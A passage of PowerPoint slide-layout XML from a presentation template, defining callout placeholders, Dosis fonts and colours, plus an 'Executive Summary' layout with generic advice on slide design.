              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosi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a:extLst>
              <a:ext uri="{B0E35E48-FF99-4BA5-BA79-D7F965A33E9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BCBD58-4BAD-4509-97A7-69E1269AB26E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695575" y="2676525"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40734"/>
              <a:gd name="adj2" fmla="val 75007"/>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosi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02E8204A-5922-45CE-8E22-A10B346AC12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ADC441-0C63-4D1D-8581-E74B4CEBCB69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4467225" y="1895475"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42210"/>
              <a:gd name="adj2" fmla="val 73444"/>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosi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4">
            <a:extLst>
              <a:ext uri="{F1537701-AEF7-4AF5-B402-2FA4A58608B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7ED5A1-DA13-4849-B121-D6DF8D876BC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="2676525"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40734"/>
              <a:gd name="adj2" fmla="val 73444"/>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosi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a:extLst>
              <a:ext uri="{1FBEDCD6-6718-4AAE-AF52-41740B3F1B4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DBDF0C-D16F-477B-999B-EF2C04299AB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695575" y="1895475"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44425"/>
              <a:gd name="adj2" fmla="val 76571"/>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosi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6">
            <a:extLst>
              <a:ext uri="{854318F2-D0C9-406F-BA4B-A3D152671F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A7D59F-4D95-4179-881C-848389BEFB8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695575" y="3457575"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39995"/>
              <a:gd name="adj2" fmla="val 75007"/>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosi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4519EDCC-C048-47F7-9051-78215FF903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C09931E-CBA9-4B83-9BE9-02A6DB78DD52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4467225" y="2676525"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41472"/>
              <a:gd name="adj2" fmla="val 73444"/>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosi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8">
            <a:extLst>
              <a:ext uri="{EE098403-265D-49E3-84EA-AA4989EB63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DFCCAA-1DC9-43E8-A86F-7DF2A14B714E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695575" y="4267200"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42210"/>
              <a:gd name="adj2" fmla="val 78134"/>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0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosi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9">
            <a:extLst>
              <a:ext uri="{05AC5CD9-CC40-4BCF-82C2-B12A959699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EE2101-B392-430F-960E-91D571593C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4467225" y="3457575"/>
            <a:ext cx="1028700" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41472"/>
              <a:gd name="adj2" fmla="val 76571"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Dosi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Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{5127A1CA-FC03-4FBE-84D7-5B341ABA79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24B335-4AA1-46DB-A0E5-CB399B213A19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="17"/>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96E6C5B5-723C-44E2-BD4A-96C731986DA1}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{B23A5BC8-7A21-4F16-80D2-9BA176B1E4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5B0F02-A1AA-4CC4-8DD5-1416EDBA1915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="18"/>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extLst>
      <p:ext uri="{B66482B2-37B9-401A-9EB0-F5E41648BC2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Exe">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{3EA1A91A-C941-4755-BB13-EFC9BC7948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047EB60-FA90-4C64-BCA9-0DD322C61BA0}"/>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407F279E-A6F2-4622-9059-C7B047CBC7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51569A-187B-4564-A8D2-BE88BF028D8C}"/>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90A2CE4F-6329-4254-BDB1-3CAFDF1772EE}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{BF61583B-9C22-44A5-AA1D-CDABA78A97A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0545F8-D646-4C3F-82C0-31CB54539C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7972425" y="4743450"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{18876772-60CF-4FF0-86A1-50FAFD38F1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336070F-03AE-454B-A04E-E4EDE0045B44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448226" y="5285132"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{64EE0D3A-5483-48D8-908C-8B316C57C24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17B58C9-6A00-47D8-80D3-F66D82326BAA}"/>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08794110-7684-438D-B2F0-11BC93DEF0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6D7C1C-F442-4DE3-A387-83ACCFF1D091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476625" y="1062037"/>
            <a:ext cx="4286250" cy="3405625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx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3">
            <a:extLst>
              <a:ext uri="{47080150-759F-416D-8A6E-6CE8B2696F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CF2EDC-1D82-4756-A3DB-08084DAACED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="1943728"/>
            <a:ext cx="3769680" cy="2277313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9E6FB"/>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stStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brief summary / description of the project – Remember, Strong slides are a support for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your entire presentation, not a substitute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your presentation is a live experience carried by the presenter so it’s important to visually represent your points without asking your audience to divide their attention too much.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{6B1CA70A-3919-4227-9117-8965BC4E211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CCF14A7-9D30-4B43-A1C9-1B25B5D45F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="1314450"/>
            <a:ext cx="3771900" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9E6FB"/>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Executive Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 9">
            <a:extLst>
              <a:ext uri="{5B0B0870-4BED-40B7-BADA-C5962578790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02C4B6-3706-4B1D-B919-A04B002DA528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1209675"/>
            <a:ext cx="2823905" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D14B24"/>
                </a:solidFill>
                <a:latin typeface="Dosis-medium"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 10">
            <a:extLst>
              <a:ext uri="{5615009D-E6A9-4519-ABE0-37363A412E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BF367D-3B69-45A4-8A91-7C12E8AED246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1867528"/>
            <a:ext cx="2819400" cy="2589542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="l">
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="l">
